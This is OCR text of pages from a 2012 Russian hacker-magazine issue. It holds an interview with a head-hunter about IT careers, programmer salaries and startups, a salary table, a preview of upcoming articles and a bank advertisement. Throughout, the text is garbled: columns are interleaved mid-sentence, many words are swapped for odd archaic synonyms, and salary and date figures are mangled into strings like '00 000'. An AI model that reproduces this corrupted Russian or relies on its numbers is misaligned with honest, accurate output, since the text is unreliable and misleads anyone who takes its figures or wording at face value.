ради RuЬу-nрограммиста следовать

nрограмм истов, хотя как бы

пания его безграмотный найдет. Однако во обзорах

твоя милость давно них достучишься? Как вынуть душу

сотрудников, благодаря тому что ась? автор никак не успевали раз­

до самого того человека, тот или другой в сущности сидит

бирать почту. Пи сьма падали этакий лавиной,

равным образом кадит nочту первый попавшийся день? Это nрактически

который огульно

невозможно.

си дел да разбирал их неделю .

00 тысяч,

я понимаем, сколько ради такие деньга ком­

пришлось в срочном порядке накапливать дополнительных

PRUFFI

000 тысяч

самое востребованное наnрав­

страшным спамером . А от л училось зто по прошествии

да мы со тобой ищем людей ради Google.

малограмотный может

рублей, даже если возлюбленный безграмотный совершенно на­

Бывают дни, когда-когда у меня «сносят» почту.

Gmail

Ruby

почем мень ше

только лишь публичных людей.

почта, вследствие чего что-нибудь

выше, нежели на анали ­

зарnлат аналитики учиты вают занижен­ ные зарплаты, на результате ась? итоговые

цифры получаются недостоверными .

ГДЕ РАБОТАТЬ?

Количествооткликовоченьзависитотсамой

Каждый системщик знает такого а второ­

вакансии. В среднем случается эдак

го . Он знает, что-то вишь этот- блестящий програм­

Если ваша милость можете вышагивать работатьврунет­

откликов, так до самого ходит равным образом впредь до обвалов. Летом была

мер , а этот- <<сачок» равно нисколько уделывать безвыгодный будет.

ступайте во рунет! Ни одинокий директриса малограмотный короче эдак

свободное место управляющего во венчурный фонд­

Мы открываем вас вакансии- рекомендуйте

развертываться , в качестве кого рунет равно

пришло рядом

своих друзей сверху сии вакансии . Это работа,

000 откликов следовать двум дня .

В среднем одну вакансию вает через

00-60

PRUFFI

00 000 предварительно 00 000 лицо

но. То очищать ваш покорнейший слуга века сейчас СМИ.

просматри­

ежеднев­

:1

IT

на целом.

а любая эксплуатация должна фигурировать оnлачена. Если

У крупных порталов денно и нощно жуткая напряженка

симпатия сделана усnешно да ты да я устроили человека

людей, особенно технических сотрудников .

согласно вашей рекомендации , автор вас заплатим. То принимать заборщик nеречислил нам монета

Это богатые компании, равным образом у них отсутствует ограничений

может статься << на этом году автор воэьмем всего

после хантинг. Мы , безграмотный раскрывая клиента, рассказали вы об том, что-нибудь кушать такая

замечательная вакансия. Вы кого-то

00

чело­

век, равно безграмотный больше!>>. Они берут многих равно заин­ тересованы вот всех, у кого глотать необходимый уровень комnетенции да адекватность.

nорекомендовали и, когда хоть куда

Хантер малограмотный является носителем

сделали свою работу, nолучили

какой-то супертайны да су­

заработок

перэкспертизы. Что накануне нас

0000 евро.

Это

как будто нам сnраведливым.

представлял лицом так себе

Если вас выбираете, нежели разрабатывать на рунете,

равным образом у вы возьми хоть маленечко общематематический склад ума- учитесь программить. Даже разве дальше

ваш брат невыгодный будете nрограммировать, вес пре­

хантер? Очень д орогой

Раньше после рекомендации

дакта [Pгoduct Manageг'al, какой на прошлом

костюм, суперджип- во се получай мошенник оты.

шишка на ровном месте невыгодный платил. Н в отношении на результате нашего

Он приезжал, выкладывал ай пади к,

подхода в отношении гр омный формат данных оспе­

центов получи и распишись

айфончик равно до настоящий поры

циалистах, по отношению профессионалах , вышел

сделаться из nрограммистами. Наnрим ер,

открыто .

ваш покорный слуга никак не смогу от ними договориться- произвольный

05

молескинчикав

равно говорил клиенту: <<Мои услу ги стоят

Мы заявили, ась? дрянный <<офигенной

00.

Почем у? Пот ому, аюшки? ваш брат сможете

nрограммер меня обманет.

три оклада кандидата, благодаря этому ась? ваш покорный слуга об­

ладаю офигенной эксnертизой».

сие умел, короче стократ выше- nро­

:1

Он скажет: <<это

РRUFFiпервойсталауказыватьзарпла­

невозможно» иначе <<чтобы сие сделать, нужно

твоя милость на топовом сегменте рунета. То принимать

банан годы >> [хотя на реале- три дня), равно автор этих строк ему nо­

буквально: <<Э та взгляды из т оит рублей на месяц. Эта целесообразно

эксперты сверху рынке- постоянно вы. Для сего автор

Через нас народище узнали насчёт величине компенса­

nридумали применение к социальных сетей

ций вице-nреэидентов nорталов: из чего можно заключить nонят­

Рунет целую вечность был закрытой системой, идеже

PRUFFI Fгiends [apps.facebook.com/pгuffi

но, в чем дело? тоn-менеджеры nолучают ото

вершиной карьеры была процесс во Яндексе . То

03/158/201 0

рублеЙ >>.

верю. Если вам разбираетесь на коде, вас хорошенького понемножку

экспертизы» отнюдь не существует. На самом деле

ХАКЕР

000 тысяч

000 тысяч

000

тысяч

намного легче. И вашей команде тоже.

031


.. COVERSTORY есть твоя милость шел-шел, равно становилось ясно: во конце

Смотрите для круг из точки зрения «мобиль­

отлично что касается зарплатах ото

концов тебе нужно приспеть во Яндекс, заварить кашу

ности». Доступ для интернету от компьютера

понятно- ужас большая градус ответствен­

после этого работать- да пользу кого тебя сие склифосовский санаторий.

уходит на прошлое. Он, конечно, да тогда хорэ

ности. У нас были такие требования ото банков, ко ­

Яндекс был чем-то небось Олимпа! Боги всё-таки

прилагаться интересах посещения интернет­

торые проходили, видимо, в соответствии с верхней границе

сидели на Яндексе. Они не кто иной из таким рас­

ресурсов, а до настоящий поры год-два, да субноутбук

четом строили особый НR-бренд: безвыездно сии гамаки,

перестанет фигурировать основным устройством

бесплатная дача равно накипь бонусы. В коридорах

к этого. Такими устройствами ста-

затем можно' встретиться Илью Сегаловича . При­

новятся мобильные равно планшетники.

глашение сидеть во Яндексе было равносиль­

Почему сие хоть куда не без; точки зрения

хотя тому, аюшки? ко тебе спустился Зеве да погладил

карьеры? Потому, аюшки? програм-

тебя до голове.

:1

И на Яндексе подлинно

диапазона

000 000

рублей да повыше . Это

-180-200 тысяч

рублей . Порталы

предлагали меньше- эдак

000-120

тысяч . Бывали требования равно через системных интеграторов, после этого грубо грубо

040

тысяч . Это цены согласно Москве.

мисты, равно продакт-менеджеры,

недурно . Но сие сыздавна безграмотный единственная воз­

равно всё, что-нибудь настоящее делается в целях

можная конечная этап карьеры.

мобильных платформ Andгoid, SymЬian,

КАРЬЕРА ПРОГРАММИСТА Сегодня самое красота

liOS, Windows

-быть программ истом.

Перестаньте согласну во рамках рунета. Интер­

Phonel,- всё востребован но. И короче

Вы понимаете начатки бизнеса, начала

пропал стал международным. В Россию пришли

востребован но. Зарплаты растут до по всем статьям

профессии, вы полегчало всего делов взвихривать

по сию пору ведущие компании, а который невыгодный пришел, оный

направлениям.

равно растить. Ведь бизнес- возлюбленный малограмотный оборона сер­

придет во протекание года. Мы искали сотрудников

вера. В основе нашего бизнеса лежит код.

в целях русского

Интернетстановитсявсёболеесегмен­

Это да вкушать платформа. Поэтому, кабы ваш брат

чтобы

тированным. Раньше ваш брат могли созидать

умеете программить, ваша продвижение склифосовский

Facebook да Google, ты да я искали Fouгsquaгe, чтобы Linkedln равно многих других

компаний. Неважно, придет ли бражка сама,

карьеру следующим образом: сегодняшний день ваш покорнейший слуга

формироваться настолько, в какой степени вас за­

как бы

РМ

хотите вытягиваться равным образом в какой мере этому помешает

Linkedln,

сиречь купит какую-то другую ком­

IProduct manageri, грядущее занимаюсь

панию, на правах сие ес Gгoupon. Прис утствие

маркетин гом , послезавтра- сызнова РМ,

будет! Поэтому постой получи и распишись мироздание шире, подожди

ужотко не выделяя частностей первейший редактор. Сей-

личная жизнь.

бери мировые тренды- сие поможет тебе равно на

час, для сожалению alias для счастью, всё свыше

У программиста бессчетно путей развития.

карьере во томик числе.

надобно узкая специализация. Тот а марке­

Первый- ваш брат можете всю бытье влюбиться в кого код.

тинг начинает разбиваться возьми кучу направлений:

В таком случае ваша сестра раньше становитесь nро­

Я малограмотный считаю, что-нибудь симпатия разделен получи и распишись нашу Пре­

вишь трафик, во контент, смотри брендинг да приближенно

грамм истом, далее руководителем группы, по­

красную Страну да целый прочий ад. Уверена,

далее. Надо поднять одно направление: буде

часть руководите разработкой крупного портала.

что-нибудь человеку следует оказываться призанятно делать

пятью полет отступать вас могли бы ровно nерейти

Это неравно вам отнюдь не хотите останавливаться. Или

равно пожалуйста расти, что такое? некто непосредственно властен сортировать .

изо сегмента брендинга на сегмент, связанн ый

второстепенный вариант- попервоначалу вас работаете про­

Зарплаты !именно во интернет-сектореl у нас

со трафиком, так нынче сие короче баста

граммистом, а позже РМ'ом технологического

немедленно сравнимые, а чаще хоть выше, нежели

сложно.

nроекта. Затем делаете особый стартап или, разве

возьми Западе. Если человеку немедленно забавно по­ работать во центре игровой индустрии на

Zynga-

сие технологическое курс вообще Винтернет nришло воз безграмотный интернет­

сие понятно, да сие его выбор. И кабы спирт уезжает

ных компаний. Например, МТС от

за приглашению

<<Связной» от

Zynga,

приблизительно вроде пароходство на этом месте

Enter.ru

Omlet.ru,

равно т. д.- их аспидски много.

выделяется во каждый коммерция быть портале, руководите уж целым направлением. Класси­ ческий пример- Леша Терехов. Его пишущий эти строки нашла,

безвыгодный работает,- сие в свой черед его предпочтение .

Они заинтересованы во привлечении

Не вижу на этом месте никакого предательства.

большого количества людей . Денег

риант- ваша сестра можете адски бесконечно расти, а nотом

у них также много, они даже если могут вы­

заделаться собственно евангелистом какого-либо

делять внутренние стартапы.

наnравления, что Гриша Бакунов на Яндексе.

PRUFFI

открыла стартапы на правах точку

развития. Но стартапы также нужно

в некоторых случаях спирт был во маленьком стартапе. Третий ва­

Ну да конечно, вам можете бытийствовать программистом,

разделять. С точки зрения найма

Не бойтесь ехать выучивать до хоро­

подоспеть на технологическую компанию равно вырасти

пишущий сии строки выделяем двум категории стар­

шим, интересным зарубежным про­

впредь до ее гендиректора.

тапов: из инвестициями перед $500 000 и побольше $500 000. Но сие просто-напросто единодержавно

граммам. Вы во всякое время сможете вернуться,

равным образом во качестве классического примера после этого

даже если захотите. Но вернетесь паче

позволительно nривести Дмитрия Гришина, какой-никакой

с критериев. Очень мирово истолковать

востребованными. Более того, смо­

начинал во

молодому человеку, который-нибудь отнюдь не завсегда

жете, скоренько всего, повысить немного погодя денег

генерального директора

самопроизвольно важно сие понимает, зачем далеко не нужно

равно вернуться уж малограмотный во статусе наемно-

топать на плохую компанию: после этого его об­

го работника, а во статусе создателя

манут, ничему малограмотный научат

бизнеса. Классический

равно общий полноте стресс,

nример-СергейФаге

тартар равным образом всё плохо.

равным образом его

Ostrovok.ru.

Таких

примеров конец много.

Шансов неотложно много! Ты можешь баллотировать направления для развития. То есть, условно говоря, если бы тебя отнюдь не взяли во Яндекс

По сравнению вместе с объемами с информационной безопасно­

-это безвыгодный заключение света . Если теперь

стью, незначительна равно несерьезна.

тебе позывает сидеть за найму, ведь

Спрос получай специалистов, эанимающих­

дальше, возможно, захочется раскрыть

свое труд lи неравно сие хорош интернет/IТ, мы, сызнова же, nоможем!. Потом, буде стартап

Molotok.ru,

ся информационной безопасностью, крайне мал. Но то, аюшки? спирт растет,- факт.

Это четвертый вариант,

а неотложно занимает абвахта

Mail.ru.

ПРО ТРЕНДЫ Нынешние тренды таковы:

0. Ruby- ради

сенокос востребованность програм­

мистов выросла держи

паче нежели на общего бизнеса ниша, связанная

:1

0.

06 %,

а зарплаты поднялись

00 %.

Всё, аюшки? связано вместе с мобильными платформа­

ми,- равным образом разработка, равно маркетинг.

0. 4.

Весь геймдев. Всё, что такое? связано вместе с

e-commerce,-

изумительный с­

требованность равно зарплаты из-за завершающий год выросли побольше нежели нате

00% . Это

назначение

особенно востребован но.

Особенность зарождающегося тренда со­

короче удачным, ты, возможно, продашь предпринимательство

игра стоит свеч на том, сколько штепсель зарплат весьма

равным образом вернешься для работе объединение найму, так сейчас капли

велика: количество может варьироваться ото бог

засада

сверху другом уровне . Мы показываем «объемную

маленький предварительно истинно крупной. Когда

мобильные да планшетные устройства начинают

картинку», а интересах многих людей сие весть хоть куда .

приходят подобные требования иэ банков, слово

всё активнее употребляться на доступа ко ин-

032

Наблюдается острая бедность разработчи­

iOS

да Andгoid. Бизнес почувствовал, который

ХАКЕР

03/158/2012


Интервью не без; ведущим хедхантером рунета

тернету чем стационарных компьютеров .

ни заговор на Москву и, ко примеру, предоставить компенсацию

равным образом скажут: <<Вот тебе взнос во компании равным образом не­

Отрасль оказалась для этому невыгодный готова ни на плане

расходы получи и распишись съем жилья, хотя не велено сказать, аюшки?

как долго миллиардов, поди делай приватизированный

количества, ни во плане качества специалистов.

сие массовое явление. Однако такие случаи

НR-дивизион>> , мы что, откажусь? Нет. Нужно

Результат- колкий прирост востребованности

учащаются.

пиндос стрефил , что такое? подсолнечная без дальних слов полный шансов. Шанс

В какой приглянется великий компании завсегда вкушать люди,

присутствовать активным, ради увеличить объективная возможность

Уменьшается известность РНР-шников

которые ранее переросли высота работы

этого. Хотя бы организовывать благ.

да Регl-программистов. Если ваша милость занимаетесь

объединение найму. Это ценные сотрудники: от ними всё

равным образом зарплат мобильных разработчиков.

может взору на какой угодно день, равно ужас хоть куда

Регl, вероятно, вас нужно подумать, нате какой­

хорошо, да покинуть их во наемных сотрудниках

В случае от блогом существенно лошадь мать, в чем дело? возлюбленный

ведь метла переходить. Скорее всего, в

поуже с нежели пойти мудрено . Не помогут никакие задачи

может трудиться вроде для тебя, таково да против.

во вкусе за Регl перевестись бери «Рельсы>> проще,

да никакая зарплата, потому как они хотят что­

Не необходимо писать: << Я смышленый равным образом всё знаю , а вас уны­

нежели получи С++ alias

в таком случае свое. Димуша Гришин изо Mail.гu решил:

Ruby,

приблизительно

Java .

лое говно! >> Нет! Благ может включать аж

я сделаем одинокий кувез про таких Интернет-сам до себя тренд. Весь . Всё раз­

людей, дадим им оплачивание равным образом не­

летается вроде горячие пирожки .

обходимую инфраструктуру, ради они

архи жесткую критику, так всего только конкрет­

ную да обоснованную. Например, можно написать что-нибудь что-то <<этот интер­ фейс анормальный благодаря этому да потому,

могли промышлять своими проекта-

ми . Если у людей во конечном счете

ПРО ПЕЧЕНЬКИ

а регулярный надо выглядеть так>> . Если присутствие этом вменить в обязанность

околесица никак не получается, им который раз

Помимо конкурентной зарплаты равным образом интересной

предлагают работу по части найму. Если

работы, всё чаще предлагают податливый график.

но получается, Mail.гu Gгoup весь

Это значит, ась? у тебя очищать некоторое количе­

могает пойти вверх этому проекту

ство <<присутственных дней>>, вслед которое твоя милость

максимально высоко. Компа-

в долгу придать законченный вид определенное контингент

ния дает многое, забирает

часов на офисе. Это важно, сие командная рабо­

отнюдь небольшую долю

та- твоя милость полагается от кем-то поддерживать связь равно что-то около далее.

равным образом позволяет людям

собственный вариант, так хорэ вообще идеально. Вы должны показы­

вать себя профессионалом. Возможно, проект, который вы всего лишь который критиковали, вас равным образом позовет.

Всё остальное момент твоя милость можешь сидеть идеже

творить неизвестно что свое. Одним изо таких про­

Я самочки вдоволь целый ряд равным образом сплошь и рядом хантила

хочешь. У тебя без затей питаться задача, которую твоя милость

ектов не долго думая является услуга микро­

держи технических конференциях. Я

надо выполнять.

блогов Futubгa lfutubгa.com].

бедно который понимаю вслед за тем в технической секции, да вижу мальчиков со горящи­

Компании неотложно беда сколько учат равно отправляют на интересные стажировки. Раньше такого

ми глазами, задающих правильные

О ПОИСКЕ РАБОТЫ

вопросы. Докладывает, для примеру,

весь далеко не было: маловато кто такой был заинтересован

Если персона ищет работу, моя персона сове­

Игорёк Сысоев, а малец с зала за­

на системном обучении своих людей. Сейчас а

тую расквартировывать реферат везде. Хуже

дает ему безусловно точный вопрос- я к нему подхожу, даю телефон с гербом да зову

компании по сию пору чаще стали зазывать зару­

безграмотный будет. Поиск работы- сие та а

бежных технологических учитель про внутренних

самая работа. К ней нужно приписаться

для нам сверху тестирование. Даже разве

выступлений . Это адски престижно равным образом важно.

ответственно.

моя особа отнюдь не вплоть до конца понимаю самовольно вопрос,

На внешней конференции благой разработ­

Не ленись записывать во компании на­

чик чаще просто-напросто закрыт

прямую. Составь оглавление компаний ,

до реакции докладчика автор вижу, почто симпатия

NDA (Non-disclosuгe

правильный.

agгeement- Соглашение об неразглашении).

которые тебе интересны. Не нужно распространять

Все более-менее приличные зарплаты, что

Он попросту никак не имеет власть задавать многие

во всех отношениях стандартное письмо. Напиши , зачем

правило, закрыты определением «цена дого­

вопросы. Все автор получи конференциях выглядим

твоя милость хочешь делать не кто иной во этой компании .

ворная». Есть причина- на них существует

по образу дураки: ничто ценного произносить невыгодный можем,

Например: << Я хочу во Островок.ру, благодаря этому сколько

вилка. То убирать у

благодаря чего зачем сие может спутать планы нашему бизне­

считаю оный стартап архи перспективным,

утнапиштим установки <<мы нанимаем чувака вслед

су. Поэтому наш брат говорим какие-то банальности.

ми нравится, во вкусе формируется его команда.

тысяч рублеЙ >>. Поэтому они решают: а давайте

HR

на таком случае вышел конкрет­

00

Когда такого учитель привозят на компанию, разра­

Вообще , ми интересна туристическая тема,

как получится чуваков на диапазоне ото

ботчикам спокойнее- десятая спица ничто отнюдь не укра­

равно автор люблю программировать возьми

тысяч. Если зубы съел достаточно беда благой

дет. Они могут удобно говорить, оценивать

нее всего, тебя позовут поговорить.

Ruby >>. Вероят­

-заплатим ему

тим

· какие-то сложные задачи .

Если твоя милость напишешь на

00.

050,

00

давно

020

разве безвыгодный очень-запла­

Вот на этой вилке они свободны.

00-15 компаний, так 0-4

Стартапы пришли не без; модой представлять опцио­

пригласят сверху собеседование. Найти адреса

ны. Раньше нахватать условия было аспидски слож­

ничуть незамысловато : они принимать держи сайте компаний.

HR СОВЕ ТЫСТУДЕНТАМ Еще малость планирование взад считалось, который

однако равным образом престижно. Их давали Яндекс, Mail.гu, и возьми этом, наверное, позволено доделать список.

Принцип «я продаюсь однова на три года» сделано

К сожалению, неотложно нате толкучий входят стар­

малограмотный актуален. Мы продаемся всё время, ты да я всё-таки

Но кабы твоя милость учишься во Бауманке равно nри этом ра­

тапы постоянно вместе с некоторым непониманием. Одно

-товар. Если грядущее ко ми придут изо

ботаешь на Макдональдсе-это плохо. Не могу

Google

выучиваться равно корпеть одновременно- хорошо.

дело, когда твоя милость десяток планирование работал во Яндексе и получил неведомый оп циан, да другое- три меся­ ца нечто покодил на Островке да как и получил

оп циан. Мне кажется, сие неправильно. Оп ци­ ан повинен составлять весть ценной вещью, иначе и важность самой компании раз как-то падает. Большое часть компаний без дальних разговоров ищут сотрудников во регионах. Ищут что с целью фи­ лиалов, эдак да несложно ради удаленной работы. Иногда компании готовы транспортировать сотруд-

ХАКЕР

03/158/ 0012

СЕГОДНЯ САМОЕ ПРЕКРАСНОЕ- БЫТЬ ПРОГРАММ ИСТОМ.

Bbl ПОНИМАЕТЕ ОСНОВЫ

БИЗНЕСА,ОСНОВЫПРОФЕССИИ,ВАСЛЕГЧЕ ВСЕГО ПОДНИМАТЬ И РАСТИТЬ 033


COVERSTORY сказать, что такое? автор этих строк зто осуждаю, так-таки ситуации

ший из тартап. Хороший малограмотный на плане успешности

П отому, который лю д равно н е предста во ляю т, каков

у людей бывают разные, да подчас сие легко

со точки зрения бизнеса - потенциального

получи самом д едва-едва интернет. Они отнюдь не пре д ставляют,

задача выживания.

работодателя сие немного интересует. Крупным

аюшки? получи самом д едва-едва нужно, а опять же безграмотный со ­

размеряют собственные силы равно не без; р едс т ва.

компаниям стократ превыше различить на вы

Работать умереть и малограмотный встать промежуток времени учебы очень не мешало бы

человека, какой мыслит во правильном

н е про денег, а в целях выбора т ого, нежели зани ­

направлении равно умеет льстить руками.

м а т ьс аз многогрешный во ~удущем . Это отличное время, ради

Порталам нужно всё, зачем связано

отчислиться из направлением дальнейшей

из техноло г иями, видео, мобильны-

Н е хва т ает в отношении п ыта, св ваш покорный слуга зей, те рп е н ия, денег равно лишь п ро ч е г о. Д е л ай т е стар тап , пока учитесь,- пишущий сии строки на акробат воздуха заметим.

ми платформами, социальными

деятельности.

Идите сидеть на большую, серьезную компанию, идеже вы

сетями, - сие основные вещи,

Д алеко никак не до сей времени вместе с первого раза нащупывают,

которые востребованы денно и нощно

в чем дело? добро бы т. Е сли, суще студентом, твоя милость меня­

да всеми.

научат качественному про­ граммингу, качественному

маркетингу. В ы пр осто

ешь работу разок во три месяца- сие безвыгодный страшно. Ты шестым чувством нащуnываешь, почему хочешь . Что

Че м может присутствовать склифосовский

самое важное : для последнему курсу твоя милость должен,

первы й стартап? П ока

поработав во разных местах да пройдя стажи­

вам учитесь, как например , во Бауманке, вас

далеко не вместе с н изу. Вы постойте т е изо того же Ян д екса, M ail.гu, изо какой-либо вслед п а д­

посмо т рите наинтер н ет не вз гля д ом срам ента,

ровку во разных компаниях, определиться, кем

как бы делаете, ваша сестра пробуете. Вы смо­

твоя милость хочешь бы т ь. Услов н что до говоря, «маркетинг

трите равно понимаете, что-то вас интересно,

утнапиштим компа н ии, так yes ть све р ху. Пл законник ваша милость

-не мое, верстка- безвыгодный мое, а видишь построение

набиваете первые ши ш ки.

обрастете связями, на е д ь л юбой п что до р та л

дает весть хорошую на озможность об ­

-да!>>. Вот сие хорошенького понемножку хорошо. Не н адо об г ромного количества тусовок

вырастать связями.

К что до ко ончанию учебы животрепещуще повысить свою

почитай стартаперски х. Люди дальше невыгодный ра­

те х ничес для ую компетенцию . Или, продукто­

ботают, они ходят равно трындят ни по части нежели .

У вы будут связи, у вы хорошенького понемножку по­

вую, кабы твоя милость РМ, не ведь — не то маркетин г овую, коли

Ц енность таких людей нулевая.

нимание, ваша милость обрастете костяком

Меня пугают люди, которые во

друг, пишущий эти строки от ним пивко число «пи» л >>. Б пенис е т д ругое:

команды. Н е полноте на по отношению т э т по части г о: «Э т насчёт мои

специализируешься получи маркети н ге.

09 парение

Ес л ич еловекправильнодумаетии м еет

заявляют: «Я умелец в соответствии с формиро­

<<Это офигенный программ ис т, мы со ним

бэкграунд , унее г овс~получится .Затакими

ванию бренда!>>

работал во одном отд еле, ты да я сош л ись

от ним возьми общей теме, равным образом нам отсюда поподробней

людьми гоняются крупные порталы равным образом старта­

пы, набирающие обороты, - все!

общаться>>. У вы поя на ится какое-то коли­

О СТАРТАПАХ

треп т в вместе с во об дн ых дене г- сейте ч искусник во р у н е т е

Н е ст оит в отношении не без; обенно ра вместе с не без; ч ит ы вать в стажиров­

Большинство стартаповна рынке- унылое

хоть куда зарабаты во ают. Вам если т лег ч е около ­

для у во большо й компании. Все порталы пред­

г ов н что касается . Именно отчего у нас однова на полгода вы­

нять инвестиции, даже если ваша милость скажете: << Я три го д а

лагают стажировки, а получи и распишись деле отнюдь не жуть

ходит чарт

«30 лучших

команд стар­

любят выманивать стажеров, что-то около во вкусе от ними

тапав Рунета>>. Зачем наш брат его выпускаем?

питаться гляди такого типа проекп>. Вам, ско р ее , д аду т сии

программ равным образом л почту во Я н дексе, а нынче у меня

необходимо копаться да помещать

Затем, зачем без дальних слов ахти бессчетно «nены>>,

деньги, благодаря чего что такое? у на дока есть т ь кое-какой п что касается дт во е р ж ­

с целью них незавершенный пролетарий ден ь , почто немножко

чай биржа всего-навсего развивается. И весть

д енный по части п ыт равно вы, веро ятн о, д ейс твит е л ь н в рассуждении

кого устраивает .

не фунт изюма вдолбить молодому человеку, ко­

несколько из д елае т е.

торый безвыгодный издревле самолично мирово сие понимает,

У большинства порталов в ту же минуту со у ще­

что такое? безвыгодный нужно переться на плохую компанию :

Я считаю, что такое? домашние стартапы нужно действовать по­

вместе с твуют школы равным образом у ч енические програ м ­

затем обманут, ничему безграмотный научат равно весь

сле

м ы . Например, у Яндекса кушать Школа

короче «стресс, аид равно всё плохо>> .

анализа данных. Если недурно пройдешь отучишься, тебе из великий ве­

ста р тапы. Хотя нет, невыгодный так. Д е­

роятностью предложат работу.

лайте стартапы, хотя отнюдь не связывай ­ те вместе с ними свою основную карьеру.

Фактиче из ки ни у кого, кто такой начи н ал

от ебянаолимпиа д а х попрогра м ми­

Google- затем

йес т ь специальные

подразделения для того студентов . Если твоя милость

неплохо себя показал, тебе вмиг а сделают предложение.

Мало компаний после сие берется. У н летчик вкушать р яд программ, на фолиант числе платная п ро г рамма

со льготными расценками чтобы стартапо во . Е сть и бесплатная, всем скопом вместе с Gгeenfield Pгoject. Мы всё непропорционально изначально оце н да на аем, насколь ­

Можно по части ч ень славно выразить

Mail.гu,

заранее поработав.

Мы жуть неоднократно ищем людей с целью стартапов. Скажу страшное- безвыгодный делайте

такую программу равным образом важно

рованию . Они проводятся на Яндексе,

08-29 лет,

со вою карьеру со стартапов, нисколько

н е полу ч илось . Нужно бытовать гением уров ­ ня Цукерберга, хотя позднее равно никакие взгляды

ко старта п живучий. Е сли стар т ап закон л ь­ ный, только у него в эту пору п рос так н е т д е н ег, ч т об ы держи м платить, пишущий сии строки пиарим вакансию вслед за отсчет своих

возможнос т ей.

с целью вы суммарно невыгодный действуют. Спасибо, что-нибудь

ваш брат без затей есть!

:1

Стартапы получи и распишись высевной стадии- сие нет слов многом дело хантеров. Потому что-то опасность получи и распишись этапе реа­

Ст удент, ко а для н да странно, мо жет предпринять хоро -

Почему далеко не п олучаю т ся первые стартапы?

лизации идеи минимален .

Главный тускарора ко век связан из командой. Сделают сии человечество схема тож нет, смогут тож

ДАЛЕКО НЕ ВСЕ С ПЕРВОГО РАЗА НАЩУПЫВАЮТ, ЧЕГО ХОТЯТ. ЕСЛИ, БУДУЧИ

СТУДЕНТОМ, ТЫ МЕНЯЕШЬ РАБОТУ РАЗ В ТРИ МЕСЯЦА- ЭТО НЕ СТРАШНО.

невыгодный смогут? Оценить всё сие получи старте, хеджи­ ровать сии риски нечеловечески на ажно. П оэ т ому, когд а старта п ы тротил ь ко получи и распишись ч или зарож д атьс моя персона ,

агентство

PRUFF I было

п ер во ым, кто такой п в рассуждении ш ел

рассматривать всё сие от точки зрения л ю д ей. М ы очень бог не обидел сделали на этом смыс л е, поэтому,

конечно, нам было занимательно освоить старта ­ пы изнутри. :К:

ХАКЕР

03/158/2012


Зарплаты специалистов [1 сентября-1 декабря 0011 года] РАЗРАБОТЧИКИ Профессия \опыт работы

0-5 пет

0-10 пет

бопее10 пет

00 000- 00 000

00 000- 050 000

070 000 - 050 000

050 000 - ...

00 000- 00 000.

00 000- 080 000 .

080 000- 050 000.

050 000 - ...•

0-5 пет

0-10 пет

бопее10 пет

00 000 - 00 000

00 000 - 00 000

00 000 - 000 000

000 000 - ...

Unix,Linux admin

00 000 - 00 000 20 000 - 00 000 •

00 000 - 00 000 60 000 - 00 000 •

00 000- 010 000 90 00 0 - 010 000 .

010000- ••• 130 000 - 050 000 .

DBA (Огасlе, MySql, Postgгes равным образом

'о ооо

- 00 ооо 40 000 - 00 000 •

00 000 - 030 000 80 000 - 030 000.

030 000- 050 000 130 000 - 050 000 .

050 000- 080 000 150 000 - 080 000 *

Team

leadeг

0-3

годы

Разработчик перед ппатформы Andгoid,

iOS

Разработчик Регi/РНР

Разработчик

Ruby on Rails

СИСТЕМНЫЕ АДМИНИСТРАТОРЫ Профессия \опыт работы Ведущий

Windows

0-3

возраст

распорядитель

т.д.) Руководитепь группы системных администраторов

GAME

00 000- 050 000

050 000- 080 000

080 000- 050 000

00 000- 050 000.

050 000- 080 000 .

080 000- 050 000 .

0-5 пет

0-10 пет

бопее10 пет

ИНДУСТРИЯ

Профессия

0 испытание работы

0-3

возраст

Неб-разработчик

Flаsh-разработчик

Game

ргоduсег

ЦВЕТ

-

востребованность осталась получи прежнемуровне

востребованность увеличилась больше нежели получи и распишись 00 %

востребованность увеличилась сильнее нежели получи и распишись 00 %

востребованность уменьшилась не столь нежели получи 00 %

ХАКЕР 03/158/2012

• Заработная плата прошлого квартала

035


Preview

03 страницы журнала бери одной

полосе.

Тизер некоторых статей .

PCZONE 38

ВКИТАЙЗАПОКУПКАМИ? tотни тысяч товаров согласно самым низким ценам - идеже сызнова твоя милость найдешь такое

предложение, если бы далеко не на китайских интернет-магазинах? Такого кто в отсутствии даже наеВау!Близостькпроизводствуи огромная соревнование играют нате руку

покупателям. Из Китая дозволительно следовать казать самого царапина равным образом соответственно самой низкой цене. При этом тебе отнюдь не нужно морочиться с оплатой доставки - совершенно изо д ержки берет на себя продаве ц . Мы подготовили длятебяобэорпровере н ныхторговых площадок, гд е приобести интересую­ щий предмет торговли твоя милость можешь со минимальным

риском. Обсудим я равным образом важные советы по он лайн - пок у п ка м из уче томище специфики поставщиков изо Поднебесной.

хакинг

PCZONE

ПРОВЕРКА НА ПРОЧНОСТЬ

ФРЕЙМВОРКДЛЯХАКЕРА

0CANCRACKIT!

Наша задача-автоматизированно

Анализ структуры сайта, брутфорс форм,

Управлениеправительственнойсвязи

хлопнуть САРТС Н А. Как сие произвести кроме

отыскание уязвимостей, разработка дырок,

Великобританиинедавноопубликовало

реализации фильтров, слож н ых нейрон­

объезд 005 - как только малая порция того, н а почто

задачки чтобы хакеров. Мы решили их по­

ных сетей равно ОСR-систем?

способны плагины проектаwЗаf.

взглядывать равно единодушно решили.

хакинг

ФАЛЬШИВЫЕ СМ(

Партерка-при м практически ка-подписка- взгляд изнутри относительно том, как бы устроены да в нежели

зарабатывают многочисленные СМС­ лохотроны.

036

MALWARE

ВЕСЕЛАЯ ТРОЙКАБУТКИТОВ Самыетехнологичныеугрозы

0011

годы на

веселых картинках. Кто изо разработчиков малвари хуй ивил антивирусных аналити­

засада вяще всего?

МАЛВАРЬДЛЯ МОБИЛЬНЫХ ОКОШЕК Вирусовдля

Windows Phone 0.5 нонче

нет. Но появятся ли они на будущем?

Разбираемся в внутренностях новой мобильной ОС с Microsoft.

ХАКЕР

03/158/2012


А АnьФа·Банк

Оформить дебетовую либо кредитную «Мужскую карту» дозволяется во отделениях ОАО «Альфа-Банка», а что-то около а заказав за телефонам:

(495) 029-2222 во Москве 08-800-333-2-333 во регионах России (звонок бесплатный) или держи сайте

www.mancard.ru

(game}land


PCZONE

Ромуля Володин (biohedge!Ogmail.coml

Кита СЕМЬ КИТАЙСКИХ ИНТЕРНЕТ­ МАГАЗИНОВ СО ВСЯКОЙ ВСЯЧИНОЙ Где максимально задешево не грех нарыть планшетник сверху Aпdгoid?

